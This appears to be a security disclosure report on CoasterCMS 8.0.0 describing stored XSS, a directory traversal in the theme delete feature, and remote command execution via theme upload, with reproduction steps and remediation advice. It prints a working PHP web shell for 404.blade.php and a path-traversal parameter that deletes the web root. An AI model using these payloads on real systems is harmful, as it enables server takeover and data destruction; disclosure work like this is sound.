Security Issues in the 8.0.0 version.

I have identified three security vulnerabilities in version 8.0.0. These vulnerabilities include Cross-Site Scripting (XSS), Directory Traversal in the Delete Feature, and Remote Command Execution. All vulnerabilities are exploitable in an authenticated state.

Stored cross-site scripting (also known as second-order or persistent XSS)

Stored Cross-Site Scripting (XSS) is a security vulnerability commonly found in web applications. It allows attackers to inject malicious scripts into web pages viewed by other users. This malicious code is stored on the server, such as in a database, and is then retrieved and displayed to users. Stored XSS attacks can lead to the theft of cookies, session tokens, or other sensitive information belonging to the victim. Unlike reflected XSS, which requires tricking a user into clicking a link, stored XSS does not require any action from the victim.

Steps to Reproduce

Authenticate the application (the permission level does not matter as they all have access to the entry point).
Go to the endpoint -> /admin/account/name/
Insert the payload to trigger the JavaScript injection.

Affected Pages

/admin/users/edit/ID/
/admin/account/

Images

XSS_Request

XSS_Response

XSS_Affected_Page

Remediation

Implement strict input validation: Ensure all user inputs are validated for type, length, format, and range.
Sanitize inputs: Use server-side input sanitization to remove or neutralize potentially harmful characters in inputs used in web pages.
Escape output: Ensure that any data dynamically included in HTML is properly escaped to prevent it from being interpreted as executable code.

Directory traversal on delete feature leading to Denial of Service (Admin level).

Directory traversal in a "delete" feature refers to a vulnerability where an attacker can access and delete files outside the intended directory in a system. By manipulating file paths, attackers can reach critical system files or directories. This can lead to Denial of Service (DoS) if essential files or services are deleted, rendering the application or server inoperative. The impact of such an attack can be severe, including system downtime, loss of data, and potential security breaches. This vulnerability underscores the importance of proper input validation and access controls in web applications.

Steps to Reproduce

Authenticate the application (the permission level does not matter as they all have access to the entry point).
Go to the page -> /admin/themes/list/
Click to delete any theme you want.
Intercept the request of the endpoint -> /admin/themes/manage/ in any proxy.
Change the parameter "theme=THEME_NAME" to the payload theme=../../var/www/coastercms

Affected Endpoint

/admin/themes/manage/

Images

Delete_Dir_Traversal_Request

Delete_Dir_Traversal

Remediation

Implement strict validation on all user inputs: Ensure that the inputs for file paths strictly adhere to expected patterns, such as specific file names or formats.
Reject unexpected inputs: Any input that does not meet the strict validation criteria should be rejected outright.
Restrict file path manipulation: Avoid allowing users to directly influence file paths. Use server-side controlled path names.
Implement safe file handling practices: Use secure methods for file access that inherently prevent directory traversal, such as using APIs that do not allow directory changes.

Remote command execution through file upload

Remote Command Execution (RCE) through file upload is a vulnerability where an attacker uploads a malicious file to a server, which is then executed. This often occurs when an application does not properly validate or restrict file types during the upload process. Successful exploitation allows the attacker to execute arbitrary code on the server, potentially gaining full control. The impact can include data theft, server hijacking, and the spread of malware to other systems. This highlights the critical need for stringent file upload security measures in web applications.

Steps to Reproduce

Authenticate the application (Admin level).
Go to the page -> /admin/themes/list/
To make things easier, download any theme in the list by clicking on the button "Export". (the source code performs verification of directory names in the .zip, and to successfully upload, we need to match these patterns)
Click on the button "Export with page data"
Decompress your zip file
Just to do a simple PoC go to the directory path /views/errors/

Edit the file 404.blade.php and put the following payload

<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
    system($_GET['cmd']);
}
?>
</pre>
</body>
</html>

Compress your new theme to zip
Go back to the browser and click on the button "Upload a new theme"
Activate your uploaded theme
Trigger 404 error accessing something that does not exist like -> /coaster/hakai
On the 404 error page, you can see the cmd input. This can also be accessed with -> /coaster/hakai?cmd=whoami

OBS: This can also be achieved by editing the files at the endpoint -> /admin/themes/edit/2/

Affected Pages

/admin/themes/manage/

Images

RCE_File_Upload_Code

RCE_File_Upload_Page

RCE_File_Upload_PoC

RCE_Edit_Laravel_File

Remediation

Content Whitelisting: Only allow specific, known-safe PHP constructs in uploaded files. This can be achieved by analyzing the PHP code to ensure it matches the expected patterns and does not contain dangerous functions.
Disable script execution in upload directories: Set the default server settings to prevent the execution of scripts in directories where files are uploaded.
Use secure upload handlers: Ensure that the file upload process is handled securely, using mechanisms that segregate uploaded files from executable directories. .

All vulnerabilities were found in an authenticated state. Environment: Issues were found, Ubuntu with CoasterCMS 8.0.0 Version.

CoasterCms / coastercms